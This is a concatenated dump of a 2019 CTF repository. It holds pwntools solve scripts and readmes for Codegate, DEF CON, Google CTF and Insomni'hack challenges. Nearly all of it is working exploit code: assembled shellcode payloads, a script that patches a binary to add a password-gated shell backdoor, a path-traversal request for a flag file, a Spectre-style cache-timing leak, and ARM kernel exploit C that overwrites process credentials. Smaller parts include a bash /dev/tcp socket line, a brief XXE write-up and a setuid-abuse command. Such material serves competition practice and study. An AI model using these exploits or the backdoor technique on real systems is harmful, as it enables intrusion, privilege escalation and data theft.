action('<') 312 | get_map() 313 | 314 | ################# 315 | action('m') 316 | r.sendline('2') 317 | r.sendline('3') 318 | r.sendline('m') 319 | r.sendline('4') 320 | r.sendline('5') 321 | r.sendline('m') 322 | r.sendline('2') 323 | r.sendline('4') 324 | r.sendline('m') 325 | r.sendline('1') 326 | r.sendline('2') 327 | 328 | for i in xrange(11): 329 | print 'done', i 330 | get_map() 331 | 332 | 333 | ######### seventh phase 334 | for i in xrange(4): 335 | action('e') 336 | action('>') 337 | action('<') 338 | get_map() 339 | 340 | ############ 341 | 342 | action('m') 343 | r.sendline('2') 344 | r.sendline('3') 345 | r.sendline('m') 346 | r.sendline('4') 347 | r.sendline('5') 348 | r.sendline('m') 349 | r.sendline('2') 350 | r.sendline('4') 351 | 352 | for i in xrange(8): 353 | print 'done', i 354 | get_map() 355 | 356 | 357 | ######### 8th phase 358 | for i in xrange(3): 359 | action('e') 360 | action('>') 361 | action('<') 362 | get_map() 363 | 364 | action('m') 365 | r.sendline('3') 366 | r.sendline('4') 
367 | 368 | for i in xrange(2): 369 | print 'done', i 370 | get_map() 371 | ############ 372 | 373 | ######### 8th phase 374 | for i in xrange(1): 375 | action('e') 376 | action('>') 377 | action('<') 378 | get_map() 379 | 380 | action('m') 381 | r.sendline('4') 382 | r.sendline('5') 383 | r.sendline('m') 384 | r.sendline('3') 385 | r.sendline('4') 386 | 387 | r.sendline('m') 388 | r.sendline('2') 389 | r.sendline('3') 390 | 391 | r.sendline('m') 392 | r.sendline('1') 393 | r.sendline('2') 394 | 395 | for i in xrange(4 + 3 + 3): 396 | print 'done', i 397 | get_map() 398 | 399 | action('>') 400 | action('>') 401 | action('m') 402 | r.sendline('0') 403 | r.sendline('1') 404 | 405 | for i in xrange(3): 406 | print 'done', i 407 | get_map() 408 | 409 | print get_map(wtfwtf=True) 410 | 411 | # r.interactive() 412 | 413 | # raw_input() 414 | 415 | print '----------------- [-] new phase -----------------------' 416 | ############ new phase 417 | ######### 9th phase 418 | action('<') 419 | 420 | for i in xrange(5): 421 | action('e') 422 | action('>') 423 | action('<') 424 | get_map() 425 | 426 | 427 | action('m') 428 | r.sendline('1') 429 | r.sendline('2') 430 | r.sendline('m') 431 | r.sendline('3') 432 | r.sendline('4') 433 | r.sendline('m') 434 | r.sendline('1') 435 | r.sendline('3') 436 | 437 | for i in xrange(8): 438 | print 'done', i 439 | get_map() 440 | 441 | ############### 10th phase 442 | 443 | for i in xrange(4): 444 | action('e') 445 | action('>') 446 | action('<') 447 | get_map() 448 | 449 | action('m') 450 | r.sendline('2') 451 | r.sendline('3') 452 | r.sendline('m') 453 | r.sendline('4') 454 | r.sendline('5') 455 | r.sendline('m') 456 | r.sendline('2') 457 | r.sendline('4') 458 | r.sendline('m') 459 | r.sendline('1') 460 | r.sendline('2') 461 | 462 | for i in xrange(11): 463 | print 'done', i 464 | get_map() 465 | 466 | 467 | 468 | ############### 11st phase 469 | 470 | for i in xrange(4): 471 | action('e') 472 | action('>') 473 | action('<') 474 | get_map() 
475 | 476 | action('m') 477 | r.sendline('2') 478 | r.sendline('3') 479 | r.sendline('m') 480 | r.sendline('4') 481 | r.sendline('5') 482 | r.sendline('m') 483 | r.sendline('2') 484 | r.sendline('4') 485 | r.sendline('m') 486 | r.sendline('1') 487 | r.sendline('2') 488 | 489 | for i in xrange(11): 490 | print 'done', i 491 | get_map() 492 | 493 | 494 | ############### 12nd phase 495 | 496 | for i in xrange(3): 497 | action('e') 498 | action('>') 499 | action('<') 500 | get_map() 501 | 502 | action('m') 503 | r.sendline('3') 504 | r.sendline('4') 505 | 506 | for i in xrange(2): 507 | print 'done', i 508 | get_map() 509 | 510 | 511 | ############### 13rd phase 512 | 513 | for i in xrange(1): 514 | action('e') 515 | action('>') 516 | action('<') 517 | get_map() 518 | 519 | action('m') 520 | r.sendline('4') 521 | r.sendline('5') 522 | 523 | r.sendline('m') 524 | r.sendline('3') 525 | r.sendline('4') 526 | 527 | r.sendline('m') 528 | r.sendline('2') 529 | r.sendline('3') 530 | 531 | r.sendline('m') 532 | r.sendline('1') 533 | r.sendline('2') 534 | 535 | for i in xrange(11): 536 | print 'done', i 537 | get_map() 538 | 539 | 540 | 541 | ############### 14th phase 542 | 543 | for i in xrange(4): 544 | action('e') 545 | action('>') 546 | action('<') 547 | get_map() 548 | 549 | action('m') 550 | r.sendline('2') 551 | r.sendline('3') 552 | r.sendline('m') 553 | r.sendline('4') 554 | r.sendline('5') 555 | r.sendline('m') 556 | r.sendline('2') 557 | r.sendline('4') 558 | r.sendline('m') 559 | r.sendline('1') 560 | r.sendline('2') 561 | 562 | for i in xrange(11): 563 | print 'done', i 564 | get_map() 565 | 566 | 567 | ############### 15th phase 568 | 569 | for i in xrange(3): 570 | action('e') 571 | action('>') 572 | action('<') 573 | get_map() 574 | 575 | action('m') 576 | r.sendline('3') 577 | r.sendline('4') 578 | 579 | for i in xrange(2): 580 | print 'done', i 581 | get_map() 582 | 583 | ############ 584 | 585 | 586 | ############### 16th phase 587 | 588 | for i in 
xrange(1): 589 | action('e') 590 | action('>') 591 | action('<') 592 | get_map() 593 | 594 | action('m') 595 | r.sendline('4') 596 | r.sendline('5') 597 | 598 | r.sendline('m') 599 | r.sendline('3') 600 | r.sendline('4') 601 | 602 | r.sendline('m') 603 | r.sendline('2') 604 | r.sendline('3') 605 | 606 | 607 | for i in xrange(8): 608 | print 'done', i 609 | get_map() 610 | 611 | 612 | ############### 17th phase 613 | 614 | for i in xrange(3): 615 | action('e') 616 | action('>') 617 | action('<') 618 | get_map() 619 | 620 | action('m') 621 | r.sendline('3') 622 | r.sendline('4') 623 | 624 | for i in xrange(2): 625 | print 'done', i 626 | get_map() 627 | 628 | ############### 18th phase 629 | 630 | for i in xrange(1): 631 | action('e') 632 | action('>') 633 | action('<') 634 | get_map() 635 | 636 | action('m') 637 | r.sendline('4') 638 | r.sendline('5') 639 | 640 | r.sendline('m') 641 | r.sendline('3') 642 | r.sendline('4') 643 | 644 | for i in xrange(5): 645 | print 'done', i 646 | get_map() 647 | 648 | 649 | ############### 19th phase 650 | 651 | for i in xrange(2): 652 | action('e') 653 | action('>') 654 | action('<') 655 | get_map() 656 | 657 | action('m') 658 | r.sendline('4') 659 | r.sendline('5') 660 | 661 | for i in xrange(2): 662 | print 'done', i 663 | get_map() 664 | 665 | action('x') 666 | 667 | # r.interactive() 668 | 669 | r.sendline('x'*1598) 670 | 671 | for i in xrange(1598): 672 | if i % 100 == 0: 673 | print 'done', i 674 | get_map() 675 | 676 | action('<') 677 | action('v') 678 | r.sendline('v'*10) 679 | 680 | for i in xrange(10): 681 | if i % 10 == 0: 682 | print 'done', i 683 | get_map() 684 | 685 | 686 | action('>') 687 | get_map() 688 | action('>') 689 | get_map() 690 | action('s') 691 | ############### final 692 | 693 | # for i in xrange(1): 694 | # action('a') 695 | # action('>') 696 | # action('<') 697 | # get_map() 698 | 699 | 700 | 701 | # action('e') 702 | 703 | # print r.recvall() 704 | 705 | # raw_input('?') 706 | 707 | r.interactive() 
708 | 709 | -------------------------------------------------------------------------------- /2019/codegate_final/bash_adventure/solve.sh: -------------------------------------------------------------------------------- 1 | #!bash 2 | exec 3<>/dev/tcp/127.0.0.1/port # I can't remember port number. 3 | read -r -u -n $MESSAGE <&3 4 | echo $MESSAGE 5 | -------------------------------------------------------------------------------- /2019/codegate_final/readme.md: -------------------------------------------------------------------------------- 1 | - I solved other web and misc challs. (its actually all the misc zzz) 2 | - But I deleted(or not saved) exploit/solver. 3 | - Sry. 4 | - If you have any questions for final challs just send me an email. 5 | -------------------------------------------------------------------------------- /2019/codegate_final/shage_beta/a.py: -------------------------------------------------------------------------------- 1 | from requests import get, put 2 | 3 | cookie = 'session=4b362d57-2ea8-4f1e-93cb-90fac2e238f4' 4 | url = 'http://110.10.147.124/stars?page={}' 5 | 6 | headers = { 7 | 'Cookie': cookie, 8 | 'Content-Type': 'application/x-www-form-urlencoded', 9 | 'X-CSRF-Token': 'IjhmN2MzZGQ0MGY0ZTEzNzQ2MmQ1NGE3YThhYmNmYTAyYmIxYmM2YzYi.XJqScg.KYvCK9MrXqSlguAekdfjDymZW94' 10 | 11 | } 12 | 13 | share_url_list = [] 14 | 15 | for i in xrange(1, 16+1): 16 | c = get(url.format(i), headers = headers).content 17 | x = c.split(' 2 | 3 | #define WASM_EXPORT __attribute__((visibility("default"))) 4 | 5 | /* 6 | WASM_EXPORT 7 | int main(void) { 8 | printf("Hello World\n"); 9 | } 10 | */ 11 | 12 | /* External function that is implemented in JavaScript. 
*/ 13 | extern void env(); 14 | extern void debug_flush(unsigned long long int); 15 | extern void debug_read(unsigned long long int); 16 | extern void check_data(unsigned int); 17 | extern unsigned long long int get_data_size(); 18 | extern unsigned long long int get_data3(); 19 | extern unsigned long long int get_data5(); 20 | extern unsigned long long int debug_ts(); 21 | 22 | /* 23 | debug_read(caching size) 24 | 25 | void __cdecl check_data(size_t idx) 26 | { 27 | if ( data_size > idx ) 28 | temp &= *(&data5.data_ptr + 0x200 * *(&data3.data_ptr + idx)); 29 | } 30 | 31 | */ 32 | 33 | int lestgo(size_t malicious_x) { 34 | 35 | static int results[256]; 36 | int tries, i, j, k, mix_i, junk = 0; 37 | size_t training_x, x; 38 | register unsigned long long int time1, time2; 39 | volatile unsigned char * addr; 40 | 41 | unsigned long long int data5 = get_data5(); 42 | unsigned long long int data3 = get_data3(); 43 | unsigned long long int data_size = data3 - 0x10; 44 | 45 | 46 | for (i = 0; i < 256; i++) 47 | results[i] = 0; 48 | for (tries = 999; tries > 0; tries--) { 49 | 50 | /* Flush array2[256*(0..255)] from cache */ 51 | for (i = 0; i < 256; i++) 52 | debug_flush(data5 + i * 512); /* intrinsic for clflush instruction */ 53 | 54 | /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ 55 | training_x = tries % 0x10; 56 | for (j = 29; j >= 0; j--) { 57 | debug_flush(data_size); 58 | for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ 59 | 60 | /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ 61 | /* Avoid jumps in case those tip off the branch predictor */ 62 | x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ 63 | x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ 64 | x = training_x ^ (x & (malicious_x ^ training_x)); 65 | 66 | /* Call the victim! */ 67 | check_data(x); 68 | 69 | } 70 | 71 | /* Time reads. 
Order is lightly mixed up to prevent stride prediction */ 72 | for (i = 0; i < 256; i++) { 73 | mix_i = ((i * 167) + 13) & 255; 74 | time1 = debug_ts(); 75 | debug_read(data5 + mix_i * 512); 76 | if (debug_ts() - time1 <= 500) 77 | results[mix_i]++; /* cache hit - add +1 to score for this value */ 78 | } 79 | 80 | /* Locate highest & second-highest results results tallies in j/k */ 81 | j = k = -1; 82 | for (i = 0; i < 128; i++) { 83 | if (j < 0 || results[i] >= results[j]) { 84 | k = j; 85 | j = i; 86 | } else if (k < 0 || results[i] >= results[k]) { 87 | k = i; 88 | } 89 | } 90 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 91 | break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */ 92 | } 93 | results[0] ^= junk; /* use junk so code above won’t get optimized out*/ 94 | 95 | return j; 96 | } 97 | 98 | WASM_EXPORT 99 | int this_is_what_ive_got() { 100 | 101 | int i; 102 | unsigned int j = 0; 103 | int idx__ = 4; 104 | size_t malicious_x; 105 | for (i=0; i<3; i++) { 106 | malicious_x = 0x100 + idx__ + i; 107 | j += letsgo(malicious_x); 108 | j <<= 8; 109 | } 110 | 111 | malicious_x = 0x100 + idx__ + i; 112 | j += letsgo(malicious_x); 113 | 114 | 115 | return j; 116 | } 117 | 118 | -------------------------------------------------------------------------------- /2019/defcon/lcars/readme.md: -------------------------------------------------------------------------------- 1 | - i will post full-writeup for lcars series asap. 
2 | -------------------------------------------------------------------------------- /2019/defcon/lcars/solve_first.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | # ./LCARS init.sys loader.sys echo.sys crypto.sys root.key flag1.papp flag2.txt flag3.txt 5 | # r = process(['./LCARS', 'init.sys', 'loader.sys', 'echo.sys', 'crypto.sys', 'root.key', 'flag1.papp', 'flag2.txt', 'flag3.txt']) 6 | r = remote('lcars000.quals2019.oooverflow.io', 5000) 7 | 8 | script = ''' 9 | b *0x0000000100001BEC 10 | b *0x00000001000011AA 11 | set follow-fork-mode child 12 | set follow-fork-mode parent 13 | ''' 14 | 15 | # gdb.attach(r, script) 16 | 17 | HEADER = 'EFIL' + p32(0x1) 18 | HEADER = HEADER.ljust(0x28, '\x00') 19 | 20 | CODE_LENGTH = 0x300 21 | 22 | SECOND = p32(0x20001000) # 0x1000 align 23 | SECOND += p32(CODE_LENGTH) # code_length 0x10 align, < 0xfff 24 | SECOND += '\x05' # sig param 8 // & 7 -> rwx 25 | SECOND += '\x00' # 0 or 1 26 | SECOND += '\x00' # sig param 10 27 | SECOND += '\x00' # 0 or 1 28 | SECOND = SECOND.ljust(0x0c, '\x00') 29 | 30 | context.arch = 'amd64' 31 | SIG_INFO = '' 32 | SIG_INFO += asm('mov rax, 0x30000000') 33 | SIG_INFO += asm('mov rbx, 0') 34 | SIG_INFO += asm('mov [rax], rbx') # switch / case 35 | SIG_INFO += asm('mov rbx, 1') 36 | SIG_INFO += asm('mov [rax+4], rbx') # s 37 | SIG_INFO += asm('mov rbx, 0xff00') # length 38 | SIG_INFO += asm('mov [rax+8], rbx') # 39 | SIG_INFO += asm('mov rbx, 1') 40 | SIG_INFO += asm('mov [rax+12], rbx') # 41 | SIG_INFO += asm('mov rbx, 1') 42 | SIG_INFO += asm('mov [rax+16], rbx') # 43 | SIG_INFO += asm('mov r13, 0x30000000') 44 | SIG_INFO += asm(shellcraft.write(0, 'r13', 0x200)) 45 | SIG_INFO += '\xc3' 46 | SIG_INFO = SIG_INFO.ljust(0x100, '\x41') 47 | 48 | # shared = 0x40000000 49 | 50 | CRYPTO_INFO = '' 51 | CRYPTO_INFO = CRYPTO_INFO.ljust(0x30, '\x42') 52 | 53 | CODE = '' 54 | CODE += '\xcc' 55 | 
CODE = CODE.ljust(CODE_LENGTH, '\xcc') 56 | 57 | data = '' 58 | data += HEADER 59 | data += SECOND 60 | data += SIG_INFO 61 | data += CRYPTO_INFO 62 | data += CODE 63 | 64 | 65 | r.sendline('run flag1.papp') 66 | r.sendline('download juno.sys %d' % len(data)) 67 | r.send(str(data)) 68 | r.sendline('run juno.sys') 69 | 70 | r.interactive() 71 | -------------------------------------------------------------------------------- /2019/defcon/readme.md: -------------------------------------------------------------------------------- 1 | # defcon ctf 2019 prequal 2 | 3 | - i solved rtoos, lcars, gloryhost and supported some other challs. 4 | - btw, some funny pictures for shellql. (https://gist.github.com/junorouse/0b89455d2f49fffb22304dc50b0d0c80) 5 | - i hope that someday i can write some papers about **LUCKY-DRIVEN-HACKING**. 6 | 7 | 8 | -------------------------------------------------------------------------------- /2019/defcon/rtoos/readme.md: -------------------------------------------------------------------------------- 1 | - if there is no more space to alloc then crux returns 0. 2 | - since the code section has RWX, base address=0, cs=0, we can simply overwrite the code, and execute arbitrary command. 3 | - i could extract honcho(main hypervisor) binary via `out` ins. (crux binary bans `honcho` string) 4 | 5 | - there is an out of bound access/write bug. no limitation of `vmmem` index. 6 | - i don't make sense but in mac os, when you alloc large memory via `valloc`, the offset between its address and image base is always same. 7 | - there is a little offset difference machine by machine, so i need to bruteforce it. 8 | 9 | - @c2w2m2 wrote final solver. 
10 | -------------------------------------------------------------------------------- /2019/defcon/rtoos/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | r = remote('rtooos.quals2019.oooverflow.io', 5000) 7 | 8 | libc_fclose = 0x8da20 - 0x1a78 9 | libc_exit = 0x8da20 - 0x1a70 10 | got_puts = 0x8da20 - 0x1b50 11 | 12 | data = ''' 13 | mov rax, -0x%x 14 | mov di, 0x64 15 | out dx, al 16 | 17 | mov rax, -0x%x 18 | mov di, 0x64 19 | out dx, al 20 | 21 | mov rax, 0x3000 22 | mov rsi, 0x10 23 | mov rdi, 0x63 24 | out dx, al 25 | 26 | mov rax, -0x%x 27 | mov di, 0x63 28 | mov rsi, 0x8 29 | out dx, al 30 | 31 | mov rax, 0x3000 32 | mov di, 0x64 33 | out dx, al 34 | 35 | ''' % (libc_fclose, libc_exit, got_puts) 36 | q = asm(data) 37 | 38 | context.log_level ='debug' 39 | payload = '\x90' * 100 40 | payload += q 41 | 42 | for i in xrange(7): 43 | r.sendlineafter('[RTOoOS>', 'export a') 44 | 45 | r.sendlineafter('[RTOoOS>', 'export a=%s' % payload) 46 | 47 | libc = u64(r.recvuntil("\x7f")[1:]+'\x00\x00') 48 | pie = u64(r.recv(6)[1:]+"\x00\x00\x00") - 0x1bee 49 | 50 | r.sendline("/bin/sh\x00") 51 | 52 | sleep(0.1) 53 | r.sendline(p64(libc - 0x000000000003a8f0 + 0x0000000000062CF9)) 54 | r.interactive() 55 | -------------------------------------------------------------------------------- /2019/defcon_final/aoool/self_backdoor.py: -------------------------------------------------------------------------------- 1 | from os import system 2 | 3 | system("cp aoool z") 4 | 5 | from pwn import * 6 | 7 | context.arch = 'amd64' 8 | e = ELF("./z") 9 | print e.address 10 | e.asm(0x22a66, ''' 11 | call $+21914 /* relative jump to eh_frame segment */ 12 | ''') 13 | 14 | e.asm(0x28000, ''' 15 | mov r15 , 44280206666 /* JUNO\n\x00\x00\x00 */ 16 | cmp [rbp], r15 17 | jnz x 18 | ''' + 19 | 20 | shellcraft.amd64.sh() 21 | 22 | + ''' 23 | x: 24 | ret 25 | ''') 26 | 27 | 
e.save("x") 28 | -------------------------------------------------------------------------------- /2019/defcon_final/jtaste/solve.py: -------------------------------------------------------------------------------- 1 | from requests import Session 2 | import json 3 | 4 | s = Session() 5 | 6 | url = 'http://10.13.37.13:5080' 7 | 8 | s.get(url) # for session intialize 9 | 10 | c = s.get(url + '/api/getboard') 11 | output = json.loads(c.text) 12 | 13 | # 721,721,247 14 | 15 | def gen_path(string): 16 | x = [] 17 | for s in string: 18 | if s == '.': 19 | x.append(721) 20 | elif s == '/': 21 | x.append(247) 22 | else: 23 | x.append(ord(s)) 24 | 25 | return x 26 | 27 | attack_path = '../../../../../../../../../flag' 28 | 29 | sigs = output['sigs'] 30 | 31 | payload = { 32 | 'sig': sigs[sigs.keys()[0]], 33 | 'v': sigs.keys()[0], 34 | } 35 | 36 | for i in range(len(attack_path)): 37 | c = s.post(url + '/api/verify', json=payload) 38 | print c.text 39 | 40 | 41 | payload = { 42 | 'state': { 43 | 'counter': [0, 1, gen_path(attack_path)] 44 | } 45 | } 46 | 47 | c = s.post(url + '/api/', json=payload) 48 | print c.text 49 | 50 | c = s.get(url + '/api/persistent') 51 | print c.text # flag 52 | -------------------------------------------------------------------------------- /2019/defcon_final/telooogram/exploit.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | import sys 3 | 4 | url = 'http://telooogram.oooverflow.io//send?token=39faeeb98663192c0a2a4b992ec775ce&to=SeoulPlusBadAss_d44681b5f668cdccabab046b33bcf006&blob=' 5 | 6 | url = 'http://telooogram.oooverflow.io//send?token=99aa4446a37deffbc33bdf07d5449067&to=team%02d&blob=' % int(sys.argv[1]) 7 | # print url+c 8 | c = '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' 9 | c = post(url + c) 10 | 11 | # print c.text 12 | -------------------------------------------------------------------------------- /2019/defcon_final/telooogram/poll_submit_flag.py: 
-------------------------------------------------------------------------------- 1 | from requests import get, post 2 | import time 3 | import json 4 | 5 | while True: 6 | c = get('http://telooogram.oooverflow.io//msg?token=99aa4446a37deffbc33bdf07d5449067') 7 | try: 8 | data = json.loads(c.text) 9 | for x in data: 10 | if 'MDAwR'.encode('hex') in x['blob']: 11 | flag = ('MDAw' + x['blob'].decode('hex').split('MDAw')[1][:60]).decode('base64') 12 | c = post('http://54.177.169.8:4000/api/submit_flag/'+ flag) 13 | print c.text 14 | elif 'eyAidXNlcm'.encode('hex') in x['blob']: 15 | print 'findfind!!!', x['blob'] 16 | except Exception as e: 17 | print e 18 | print 'error' 19 | -------------------------------------------------------------------------------- /2019/gctf/bnv/readme.md: -------------------------------------------------------------------------------- 1 | # BNV 2 | 3 | This is a web service which can inquire the information of the world's Braille office. 4 | 5 | ## Vulnerability 6 | 7 | There is a SIMPLE XXE bug. 8 | 9 | ## Exploit 10 | 11 | ```xml 12 | 13 | 15 | 16 | 17 | 20 | "> 21 | %eval; 22 | %error; 23 | 24 | '> 25 | 26 | %local_dtd; 27 | 28 | ]> 29 | 30 | ``` 31 | -------------------------------------------------------------------------------- /2019/gctf/devmaster8000/readme.md: -------------------------------------------------------------------------------- 1 | # devmaster 8000 2 | 3 | cloud build system. 4 | 5 | ## Vulnerability 6 | 7 | There is a setuid misconfiguration on `drop_privs` file. 8 | 9 | ## Exploit 10 | 11 | `/client nc devmaster.ctfcompetition.com 1337 -- source.c -- my_binary -- ../../drop_privs admin admin cat ../../flag` 12 | -------------------------------------------------------------------------------- /2019/gctf/doomed_to_repeat_it/readme.md: -------------------------------------------------------------------------------- 1 | # Doomed to Repeat It 2 | 3 | This is a (golang + javascript) memory game. 
4 | 5 | ## Vulnerability 6 | 7 | ```go 8 | // OsRand gets some randomness from the OS. 9 | func OsRand() (uint64, error) { 10 | // 64 ought to be enough for anybody 11 | var res uint64 12 | if err := binary.Read(rand.Reader, binary.LittleEndian, &res); err != nil { 13 | return 0, fmt.Errorf("couldn't read random uint64: %v", err) 14 | } 15 | // Mix in some of our own pre-generated randomness in case the OS runs low. 16 | // See Mining Your Ps and Qs for details. 17 | res *= 14496946463017271296 18 | fmt.Println("random", res); 19 | return res, nil 20 | } 21 | ``` 22 | 23 | `hex(14496946463017271296) == 0xc92f800000000000` the lower bits of pre-generated randomness are zero. Only Ffwer seeds are generated, that can be bruteforced. 24 | 25 | ## Exploit 26 | 27 | 28 | ```go 29 | func main() { 30 | a := [28][28][28][28][]int{} 31 | 32 | b := &board{ 33 | nums: make([]int, 56), 34 | visible: make([]bool, 56), 35 | } 36 | 37 | for loop := 0; loop < 0x100000; loop++ { 38 | // fmt.Println(i) 39 | if (loop % 0x1000 == 0) { 40 | fmt.Println("here", loop / 0x1000) 41 | } 42 | 43 | rand, _ := random.New2(uint64(loop)) 44 | 45 | // BoardSize is even 46 | for i, _ := range b.nums { 47 | b.nums[i] = i / 2 48 | } 49 | // https://github.com/golang/go/wiki/SliceTricks#shuffling 50 | for i := 56 - 1; i > 0; i-- { 51 | j := rand.UInt64n(uint64(i) + 1) 52 | // fmt.Println(j); 53 | b.nums[i], b.nums[j] = b.nums[j], b.nums[i] 54 | } 55 | 56 | a[b.nums[0]][b.nums[1]][b.nums[2]][b.nums[3]] = append(a[b.nums[0]][b.nums[1]][b.nums[2]][b.nums[3]], loop) 57 | } 58 | 59 | file, _ := json.Marshal(a) 60 | 61 | _ = ioutil.WriteFile("test.json", file, 0644) 62 | ... 63 | ``` 64 | 65 | 66 | ```javascript 67 | protocol = window.location.protocol === 'https:' ? 
'wss://' : 'ws://'; 68 | ws = new WebSocket(protocol + window.location.host + '/ws'); 69 | 70 | let table = []; 71 | 72 | ws.onopen = () => { 73 | ws.send(JSON.stringify({op: 'guess', body: {X: 0, Y: 0}})); 74 | ws.send(JSON.stringify({op: 'guess', body: {X: 1, Y: 0}})); 75 | ws.send(JSON.stringify({op: 'guess', body: {X: 2, Y: 0}})); 76 | ws.send(JSON.stringify({op: 'guess', body: {X: 3, Y: 0}})); 77 | } 78 | ws.onmessage = (x) => { 79 | let y = JSON.parse(x.data); 80 | let board = y.board; 81 | for (let i=0; i 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | // gcc -o a a.c libc.s -nostartfiles -nostdlib -static -Os 21 | // 22 | __attribute__((naked)) long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, unsigned long arg){ 23 | 24 | __asm __volatile ( 25 | "swi 0x9000DD\n" 26 | "mov pc, lr\n" 27 | : 28 | : 29 | : 30 | ); 31 | } 32 | 33 | #define F_OFD_GETLK 36 34 | #define F_OFD_SETLK 37 35 | #define F_OFD_SETLKW 38 36 | 37 | int _start(void) 38 | { 39 | 40 | int fd = open("/proc/cpuinfo", O_RDONLY); 41 | struct flock *map_base = 0; 42 | struct flock *map_base2 = 0; 43 | 44 | if(fd == -1){ 45 | write(1, "open error\n", 11); 46 | return -1; 47 | } 48 | 49 | map_base = (struct flock *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 50 | 51 | map_base->l_start = SEEK_SET; 52 | 53 | unsigned int f_task = 0xc1307080 + 500; 54 | read(0, &f_task, 4); 55 | 56 | if(sys_oabi_fcntl64(fd, F_OFD_GETLK, (long)map_base)){ 57 | write(1, "fcnt error\n", 11); 58 | return -1; 59 | } 60 | 61 | 62 | unsigned int next_task = 0; 63 | unsigned int *juno= 0; 64 | unsigned int task_offset = 500; 65 | unsigned int comm_offset = 900; 66 | 67 | 68 | write(1, "[+] find sh cred haha\n", 22); 69 | 70 | 71 | write(1, f_task - task_offset + comm_offset, 5); 72 | write(1, 
"\n", 1); 73 | write(1, "done!\n", 6); 74 | 75 | 76 | int wtf; 77 | 78 | int junofd = open("./tmp", O_WRONLY); 79 | write(junofd, f_task, 4); 80 | close(junofd); 81 | 82 | int junofd2 = open("./tmp_cred", O_WRONLY); 83 | write(junofd, f_task+400-4, 4); 84 | close(junofd); 85 | 86 | 87 | // write(1, next_task - task_offset + comm_offset, 5); 88 | 89 | write(1, "\n", 1); 90 | write(1, "done!\n", 6); 91 | 92 | _exit(0); 93 | } 94 | 95 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/b.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | // gcc -o a a.c libc.s -nostartfiles -nostdlib -static -Os 21 | // 22 | __attribute__((naked)) long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, unsigned long arg){ 23 | 24 | __asm __volatile ( 25 | "swi 0x9000DD\n" 26 | "mov pc, lr\n" 27 | : 28 | : 29 | : 30 | ); 31 | } 32 | 33 | #define F_OFD_GETLK 36 34 | #define F_OFD_SETLK 37 35 | #define F_OFD_SETLKW 38 36 | 37 | 38 | int _start(void) 39 | { 40 | 41 | int fd = open("/proc/cpuinfo", O_RDONLY); 42 | struct flock *map_base = 0; 43 | struct flock *map_base2 = 0; 44 | 45 | if(fd == -1){ 46 | write(1, "open error\n", 11); 47 | return -1; 48 | } 49 | 50 | map_base = (struct flock *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 51 | 52 | map_base->l_start = SEEK_SET; 53 | 54 | unsigned int cred = 0; 55 | 56 | int junofd = open("./tmp_cred", O_RDONLY); 57 | read(junofd, &cred, 4); 58 | close(junofd); 59 | 60 | if(sys_oabi_fcntl64(fd, F_OFD_GETLK, (long)map_base)){ 61 | write(1, "fcnt error\n", 11); 62 | return -1; 63 | } 64 | 65 | write(1, "[+] gogo cred haha\n", 22); 66 | 67 | int pipefd[2]; 68 | 69 | 
pipe(pipefd); 70 | write(pipefd[1], cred+0x30, 4); 71 | read(pipefd[0], cred+4, 4); 72 | write(pipefd[1], cred+0x30, 4); 73 | read(pipefd[0], cred+8, 4); 74 | write(pipefd[1], cred+0x30, 4); 75 | read(pipefd[0], cred+12, 4); 76 | write(pipefd[1], cred+0x30, 4); 77 | read(pipefd[0], cred+16, 4); 78 | write(pipefd[1], cred+0x30, 4); 79 | read(pipefd[0], cred+20, 4); 80 | write(pipefd[1], cred+0x30, 4); 81 | read(pipefd[0], cred+24, 4); 82 | write(pipefd[1], cred+0x30, 4); 83 | read(pipefd[0], cred+28, 4); 84 | write(pipefd[1], cred+0x30, 4); 85 | read(pipefd[0], cred+32, 4); 86 | 87 | close(pipefd[0]); 88 | close(pipefd[1]); 89 | 90 | write(1, "\n", 1); 91 | write(1, "done!\n", 6); 92 | 93 | _exit(0); 94 | } 95 | 96 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/build_exp.sh: -------------------------------------------------------------------------------- 1 | arm-linux-gnueabi-gcc -o b b.c libc.s -nostartfiles -nostdlib -static -Os -w 2 | cat b | base64 3 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/build_leak.sh: -------------------------------------------------------------------------------- 1 | arm-linux-gnueabi-gcc -o a a.c libc.s -nostartfiles -nostdlib -static -Os -w 2 | cat a | base64 3 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/libc.s: -------------------------------------------------------------------------------- 1 | __syscall: 2 | stmfd sp!, {r4, r5, r7, lr} 3 | ldr r4, [sp, #16] 4 | ldr r5, [sp, #20] 5 | mov r7, r12 6 | swi #0 7 | 8 | cmn r0, #4096 9 | rsbcs r2, r0, #0 10 | ldrcs r3, =errno 11 | mvncs r0, #0 12 | strcs r2, [r3] 13 | ldmfd sp!, {r4, r5, r7, pc} 14 | 15 | .global errno 16 | errno: 17 | .word 0 18 | 19 | .global _exit 20 | _exit: 21 | mov r12, #1 22 | b __syscall 23 | 24 | .global read 25 | 